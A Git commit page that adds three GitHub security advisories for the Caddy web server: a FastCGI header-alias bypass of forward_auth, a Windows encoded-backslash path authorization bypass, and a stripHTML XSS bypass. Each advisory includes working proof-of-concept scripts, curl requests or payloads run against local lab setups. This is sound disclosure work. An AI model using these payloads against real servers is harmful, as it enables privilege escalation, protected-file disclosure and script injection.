Skip to content

Commit 03405cb

Browse files
1 parent 21860f5 commit 03405cb

3 files changed

Lines changed: 234 additions & 0 deletions

File tree

Lines changed: 78 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,78 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-f59h-q822-g45g",
4+
"modified": "2026-06-16T21:28:28Z",
5+
"published": "2026-06-16T21:28:28Z",
6+
"aliases": [
7+
"CVE-2026-52845"
8+
],
9+
"summary": "Caddy: FastCGI header normalization bypass in `forward_auth copy_headers`",
10+
"details": "### Summary\n\n`forward_auth copy_headers` deletes the exact client-supplied identity header before copying the trusted value from the auth gateway. But when the request later goes through `php_fastcgi`, Caddy normalizes HTTP headers into CGI variables by replacing `-` with `_`.\n\nThis lets a client send an underscore alias that survives the `forward_auth` delete step but becomes the same PHP/FastCGI variable:\n\n```text\nRemote-Groups -> HTTP_REMOTE_GROUPS\nRemote_Groups -> HTTP_REMOTE_GROUPS\n\nRemote-User -> HTTP_REMOTE_USER\nRemote_User -> HTTP_REMOTE_USER\n```\n\nResult: a remote client can inject or sometimes override identity/group headers trusted by PHP/FastCGI applications behind Caddy.\n\n### Details\n\n`forward_auth copy_headers` intentionally removes client-controlled headers before setting values from the auth response:\n\n- `modules/caddyhttp/reverseproxy/forwardauth/caddyfile.go:212`\n- `modules/caddyhttp/reverseproxy/forwardauth/caddyfile.go:222`\n\nThat delete is exact-field deletion through `http.Header.Del()`:\n\n- `modules/caddyhttp/headers/headers.go:255`\n- `modules/caddyhttp/headers/headers.go:281`\n\nSo deleting `Remote-Groups` does not delete `Remote_Groups`.\n\nLater, FastCGI exports all request headers into CGI variables:\n\n- `modules/caddyhttp/reverseproxy/fastcgi/fastcgi.go:410`\n- `modules/caddyhttp/reverseproxy/fastcgi/fastcgi.go:414`\n- `modules/caddyhttp/reverseproxy/fastcgi/fastcgi.go:510`\n\nThe normalizer replaces hyphens with underscores:\n\n```go\nstrings.NewReplacer(\" \", \"_\", \"-\", \"_\")\n```\n\nSo the trusted header and the attacker-controlled alias collide in the backend-visible CGI/PHP namespace.\n\nThis is distinct from GHSA-7r4p-vjf4-gxv4. That issue allowed exact copied headers to survive. This report reproduces after the exact-header fix because the bypass uses a different HTTP field name that only becomes equivalent during Caddy's FastCGI export.\n\n### PoC\n\nRun from the Caddy repository root with `bash`:\n\n```bash\nset -euo pipefail\n\ntmpdir=$(mktemp -d /tmp/caddy-fastcgi-header-collision.XXXXXX)\nmkdir -p \"$tmpdir/www\"\nprintf '<?php echo \"ok\"; ?>\\n' > \"$tmpdir/www/index.php\"\n\ncat > \"$tmpdir/servers.go\" <<'GO'\npackage main\n\nimport (\n\t\"fmt\"\n\t\"log\"\n\t\"net\"\n\t\"net/http\"\n\t\"net/http/fcgi\"\n)\n\nfunc main() {\n\tgo func() {\n\t\tmux := http.NewServeMux()\n\t\tmux.HandleFunc(\"/auth\", func(w http.ResponseWriter, r *http.Request) {\n\t\t\tw.Header().Set(\"Remote-User\", \"alice\")\n\t\t\tw.WriteHeader(http.StatusNoContent)\n\t\t})\n\t\tlog.Fatal(http.ListenAndServe(\"127.0.0.1:19011\", mux))\n\t}()\n\n\tln, err := net.Listen(\"tcp\", \"127.0.0.1:19010\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tlog.Fatal(fcgi.Serve(ln, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\tfmt.Fprintf(w, \"HTTP_REMOTE_USER=%s\\nHTTP_REMOTE_GROUPS=%s\\n\",\n\t\t\tr.Header.Get(\"Remote-User\"),\n\t\t\tr.Header.Get(\"Remote-Groups\"))\n\t})))\n}\nGO\n\ncat > \"$tmpdir/Caddyfile\" <<EOF\n{\n\tadmin off\n\tauto_https off\n\tdebug\n}\n\n:9082 {\n\tlog\n\troot * $tmpdir/www\n\tforward_auth 127.0.0.1:19011 {\n\t\turi /auth\n\t\tcopy_headers Remote-User Remote-Groups\n\t}\n\tphp_fastcgi 127.0.0.1:19010\n}\nEOF\n\ncleanup() {\n\tkill \"${caddy_pid:-}\" \"${servers_pid:-}\" 2>/dev/null || true\n}\ntrap cleanup EXIT\n\ngo run \"$tmpdir/servers.go\" >\"$tmpdir/servers.log\" 2>&1 &\nservers_pid=$!\n\nfor i in $(seq 1 80); do\n\tif (echo > /dev/tcp/127.0.0.1/19011) >/dev/null 2>&1 &&\n\t (echo > /dev/tcp/127.0.0.1/19010) >/dev/null 2>&1; then\n\t\tbreak\n\tfi\n\tsleep 0.25\ndone\n\ngo run ./cmd/caddy run --config \"$tmpdir/Caddyfile\" --adapter caddyfile >\"$tmpdir/caddy.log\" 2>&1 &\ncaddy_pid=$!\n\nfor i in $(seq 1 80); do\n\tif (echo > /dev/tcp/127.0.0.1/9082) >/dev/null 2>&1; then\n\t\tbreak\n\tfi\n\tsleep 0.25\ndone\n\ncurl --noproxy '*' -v http://127.0.0.1:9082/index.php\ncurl --noproxy '*' -v -H 'Remote_Groups: admin' http://127.0.0.1:9082/index.php\ncat \"$tmpdir/caddy.log\"\n```\n\nObserved on commit `6c675e29f87cbe7326983ddb6d739175119d394c`:\n\nBaseline:\n\n```text\n> GET /index.php HTTP/1.1\n< HTTP/1.1 200 OK\n\nHTTP_REMOTE_USER=alice\nHTTP_REMOTE_GROUPS=\n```\n\nWith attacker header:\n\n```text\n> GET /index.php HTTP/1.1\n> Remote_Groups: admin\n< HTTP/1.1 200 OK\n\nHTTP_REMOTE_USER=alice\nHTTP_REMOTE_GROUPS=admin\n```\n\nCaddy debug log confirms the FastCGI environment contained:\n\n```text\n\"HTTP_REMOTE_USER\": \"alice\"\n\"HTTP_REMOTE_GROUPS\": \"admin\"\n```\n\nThe auth gateway returned `Remote-User: alice` only. It never returned `Remote-Groups`.\n\n### Impact\n\nThis affects Caddy deployments that use:\n\n- `forward_auth` with `copy_headers` for identity or authorization headers;\n- `php_fastcgi` / FastCGI after the auth check;\n- a PHP/FastCGI application that trusts the resulting `HTTP_*` variables.\n\nImpact examples:\n\n- deterministic group/role injection when the auth gateway omits an optional header, e.g. `Remote_Groups: admin` becomes `HTTP_REMOTE_GROUPS=admin`;\n- probabilistic user impersonation when both the auth gateway and client provide colliding identity headers, e.g. `Remote-User` and `Remote_User` both map to `HTTP_REMOTE_USER`.\n\nRealistic examples include trusted-header SSO deployments such as Firefly III `remote_user_guard` using `HTTP_REMOTE_USER`, or MediaWiki `Auth_remoteuser` using `HTTP_X_AUTHENTIK_USERNAME`.\n\n## AI disclosure\n\nThe LLM was used to help analyze the Caddy codebase, compare relevant code paths, draft the report, and organize reproduction steps. Human security research judgment and insight were used to guide the investigation, validate the root cause, run the local reproduction, assess impact, and make the final report conclusions.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "github.com/caddyserver/caddy/v2"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "2.11.4"
32+
}
33+
]
34+
}
35+
]
36+
},
37+
{
38+
"package": {
39+
"ecosystem": "Go",
40+
"name": "github.com/caddyserver/caddy"
41+
},
42+
"ranges": [
43+
{
44+
"type": "ECOSYSTEM",
45+
"events": [
46+
{
47+
"introduced": "0"
48+
},
49+
{
50+
"last_affected": "1.0.5"
51+
}
52+
]
53+
}
54+
]
55+
}
56+
],
57+
"references": [
58+
{
59+
"type": "WEB",
60+
"url": "https://github.com/caddyserver/caddy/security/advisories/GHSA-f59h-q822-g45g"
61+
},
62+
{
63+
"type": "PACKAGE",
64+
"url": "https://github.com/caddyserver/caddy"
65+
}
66+
],
67+
"database_specific": {
68+
"cwe_ids": [
69+
"CWE-287",
70+
"CWE-290",
71+
"CWE-444"
72+
],
73+
"severity": "HIGH",
74+
"github_reviewed": true,
75+
"github_reviewed_at": "2026-06-16T21:28:28Z",
76+
"nvd_published_at": null
77+
}
78+
}
Lines changed: 77 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,77 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-qrp7-cvwr-j2c6",
4+
"modified": "2026-06-16T21:28:11Z",
5+
"published": "2026-06-16T21:28:11Z",
6+
"aliases": [
7+
"CVE-2026-52844"
8+
],
9+
"summary": "Caddy: Windows `file_server` path authorization bypass via encoded backslash",
10+
"details": "### Summary\n\nOn Windows, Caddy `path` matchers treat `/private\\secret.txt` as outside `/private/*`, but `file_server` later resolves the same request path as `private\\secret.txt` on disk.\n\nAn unauthenticated remote client can request `/private%5csecret.txt` and bypass Caddy path-scoped auth/deny routes protecting `/private/*`.\n\n### Details\n\nThe mismatch is between two Caddy code paths:\n\n- `MatchPath.MatchWithError()` compares `r.URL.Path` using URL path semantics and does not normalize `\\` to `/`: `modules/caddyhttp/matchers.go:429`, `:436`, `:490`, `:532`.\n- If the route matcher misses, Caddy skips that route: `modules/caddyhttp/routes.go:271`.\n- `file_server` then maps the same request path to a filesystem path with `SanitizedPathJoin(root, r.URL.Path)`: `modules/caddyhttp/fileserver/staticfiles.go:294`, `modules/caddyhttp/caddyhttp.go:257`, `:263`.\n- On Windows, Go filesystem path handling treats `\\` as a separator, so the default filesystem opens the file under the protected directory: `internal/filesystems/os.go:18`.\n\nThis is related to, but distinct from, `GHSA-4xrr-hq4w-6vf4 / CVE-2026-27585`. That advisory fixed backslash handling in the `file` matcher / `try_files` glob path. This report does not use `try_files` or the `file` matcher; it affects ordinary `path` route matchers in front of direct `file_server` serving and reproduces on current HEAD.\n\n### PoC\n\nTested on current HEAD `6c675e29f87cbe7326983ddb6d739175119d394c` with a Windows `caddy.exe` built from this repository.\n\nOn Windows, create the test files and Caddyfile:\n\n```powershell\n$base = \"C:\\Users\\Public\\caddy-backslash-poc\"\nRemove-Item -Recurse -Force $base -ErrorAction SilentlyContinue\nNew-Item -ItemType Directory -Force \"$base\\www\\private\" | Out-Null\nSet-Content -Path \"$base\\www\\private\\secret.txt\" -Value \"SECRET_FROM_WINDOWS_LAB\" -NoNewline -Encoding ASCII\n\n@'\n{\n\tdebug\n\tadmin off\n\tauto_https off\n}\n\n:19080 {\n\tlog\n\troot * C:\\Users\\Public\\caddy-backslash-poc\\www\n\n\t@private path /private/*\n\trespond @private 403\n\n\tfile_server\n}\n'@ | Set-Content -Path \"$base\\Caddyfile\" -Encoding ASCII\n```\n\nStart Caddy:\n\n```powershell\ncd C:\\Users\\Public\\caddy-backslash-poc\n.\\caddy.exe run --config Caddyfile --adapter caddyfile\n```\n\nBaseline request, expected to be blocked:\n\n```bash\ncurl -v --path-as-is http://<windows-host>:19080/private/secret.txt\n```\n\nObserved:\n\n```text\n> GET /private/secret.txt HTTP/1.1\n< HTTP/1.1 403 Forbidden\n```\n\nBypass request:\n\n```bash\ncurl -v --path-as-is 'http://<windows-host>:19080/private%5csecret.txt'\n```\n\nObserved:\n\n```text\n> GET /private%5csecret.txt HTTP/1.1\n< HTTP/1.1 200 OK\n< Content-Length: 23\n\nSECRET_FROM_WINDOWS_LAB\n```\n\nUppercase `%5C` produces the same result.\n\nRelevant debug log lines:\n\n```json\n{\"msg\":\"using config from file\",\"file\":\"C:\\\\Users\\\\Public\\\\caddy-backslash-poc\\\\Caddyfile\"}\n{\"logger\":\"http.log\",\"msg\":\"server running\",\"name\":\"srv0\",\"protocols\":[\"h1\",\"h2\",\"h3\"]}\n{\"logger\":\"http.log.access\",\"request\":{\"method\":\"GET\",\"uri\":\"/private/secret.txt\"},\"status\":403}\n{\"logger\":\"http.log.access\",\"request\":{\"method\":\"GET\",\"uri\":\"/private%5csecret.txt\"},\"status\":200}\n```\n\n### Impact\n\nThis is a Windows-only remote authorization bypass for deployments that protect static subtrees with Caddy path matchers before `file_server`.\n\nThis pattern is documented by Caddy itself, for example `basic_auth /secret/* { ... }` followed by `file_server`.\n\nAn attacker can read files that were intended to be protected by Caddy-side `basic_auth`, `respond 403`, or other path-scoped handlers. The issue does not escape the configured site root; `..%5c` traversal is still blocked. The practical impact is sensitive file disclosure inside the protected subtree, with higher impact if that subtree contains backups, database files, exported admin data, credentials, or signing/session secrets.\n\n### Suggested Fix\n\nNormalize Windows path separators consistently before `MatchPath` evaluates request paths, or reject request paths containing `\\` before `file_server` resolves them as filesystem separators.\n\nThe important invariant is that a request path used for route authorization must not later resolve to a different protected filesystem path.\n\n### AI Disclosure\n\nLLM assistance was used for codebase analysis and report drafting. The PoC was manually validated, including an end-to-end reproduction on a Windows Server lab host using a Windows `caddy.exe` built from current HEAD.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "github.com/caddyserver/caddy/v2"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "2.11.4"
32+
}
33+
]
34+
}
35+
]
36+
},
37+
{
38+
"package": {
39+
"ecosystem": "Go",
40+
"name": "github.com/caddyserver/caddy"
41+
},
42+
"ranges": [
43+
{
44+
"type": "ECOSYSTEM",
45+
"events": [
46+
{
47+
"introduced": "0"
48+
},
49+
{
50+
"last_affected": "1.0.5"
51+
}
52+
]
53+
}
54+
]
55+
}
56+
],
57+
"references": [
58+
{
59+
"type": "WEB",
60+
"url": "https://github.com/caddyserver/caddy/security/advisories/GHSA-qrp7-cvwr-j2c6"
61+
},
62+
{
63+
"type": "PACKAGE",
64+
"url": "https://github.com/caddyserver/caddy"
65+
}
66+
],
67+
"database_specific": {
68+
"cwe_ids": [
69+
"CWE-22",
70+
"CWE-284"
71+
],
72+
"severity": "HIGH",
73+
"github_reviewed": true,
74+
"github_reviewed_at": "2026-06-16T21:28:11Z",
75+
"nvd_published_at": null
76+
}
77+
}
Lines changed: 79 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,79 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-vcc4-2c75-vc9v",
4+
"modified": "2026-06-16T21:28:55Z",
5+
"published": "2026-06-16T21:28:55Z",
6+
"aliases": [
7+
"CVE-2026-52846"
8+
],
9+
"summary": "Caddy: stripHTML template function bypass",
10+
"details": "### Summary\nCaddy’s `stripHTML` template function cannot reliably remove all HTML tags from input strings. Certain malformed HTML, such as `<<>img src=x onerror=alert()>`, can bypass the tag-stripping logic, potentially leaving dangerous content in the output if it is later rendered as HTML. This may allow client-side XSS in cases where untrusted strings are rendered unsafely.\n\n---\n\n### Details\nThe vulnerability originates from `funcStripHTML` in:\n\n[caddy/caddy/caddyhttp/templates/tplcontext.go](https://github.com/caddyserver/caddy/blob/77e9ce7404c4a76853e101a9f5687a929ee56654/modules/caddyhttp/templates/tplcontext.go)\n\n```go\nfunc (TemplateContext) funcStripHTML(s string) string {\n var buf bytes.Buffer\n var inTag, inQuotes bool\n var tagStart int\n for i, ch := range s {\n if inTag {\n if ch == '>' && !inQuotes {\n inTag = false\n } else if ch == '<' && !inQuotes {\n // false start\n buf.WriteString(s[tagStart:i])\n tagStart = i\n } else if ch == '\"' {\n inQuotes = !inQuotes\n }\n continue\n }\n if ch == '<' {\n inTag = true\n tagStart = i\n continue\n }\n buf.WriteRune(ch)\n }\n if inTag {\n // false start\n buf.WriteString(s[tagStart:])\n }\n return buf.String()\n}\n```\n\n### POC\n\nCaddyfile setup\n\n```\n:8080 {\n root * ./site\n file_server\n templates\n}\n```\n\nTemplate file (index.html)\n\n```html\n<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"UTF-8\">\n <title>StripHTML Bypass Test</title>\n</head>\n<body>\n <p>{{ stripHTML \"<<>img src=x onerror=alert('XSS')>\" }}</p>\n</body>\n</html>\n```\n\nThe payload exploits the false start branch to smuggle a literal < back into the output, then uses the following > to terminate the parser’s tag state, leaving a valid <img ...> tag behind.\n\nTested in v2.11.3\n\n### Impact\n\nMalformed HTML can bypass stripHTML, potentially allowing arbitrary HTML or JavaScript to be rendered if the output is used unsafely, leading to client-side XSS.\n\n### AI Disclosure\n\nAI assisted in writing the report description; however, the discovery of the issue has been done manually.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "github.com/caddyserver/caddy/v2"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "2.11.4"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 2.11.3"
38+
}
39+
},
40+
{
41+
"package": {
42+
"ecosystem": "Go",
43+
"name": "github.com/caddyserver/caddy"
44+
},
45+
"ranges": [
46+
{
47+
"type": "ECOSYSTEM",
48+
"events": [
49+
{
50+
"introduced": "0"
51+
},
52+
{
53+
"last_affected": "1.0.5"
54+
}
55+
]
56+
}
57+
]
58+
}
59+
],
60+
"references": [
61+
{
62+
"type": "WEB",
63+
"url": "https://github.com/caddyserver/caddy/security/advisories/GHSA-vcc4-2c75-vc9v"
64+
},
65+
{
66+
"type": "PACKAGE",
67+
"url": "https://github.com/caddyserver/caddy"
68+
}
69+
],
70+
"database_specific": {
71+
"cwe_ids": [
72+
"CWE-116"
73+
],
74+
"severity": "MODERATE",
75+
"github_reviewed": true,
76+
"github_reviewed_at": "2026-06-16T21:28:55Z",
77+
"nvd_published_at": null
78+
}
79+
}

0 commit comments

Comments
 (0)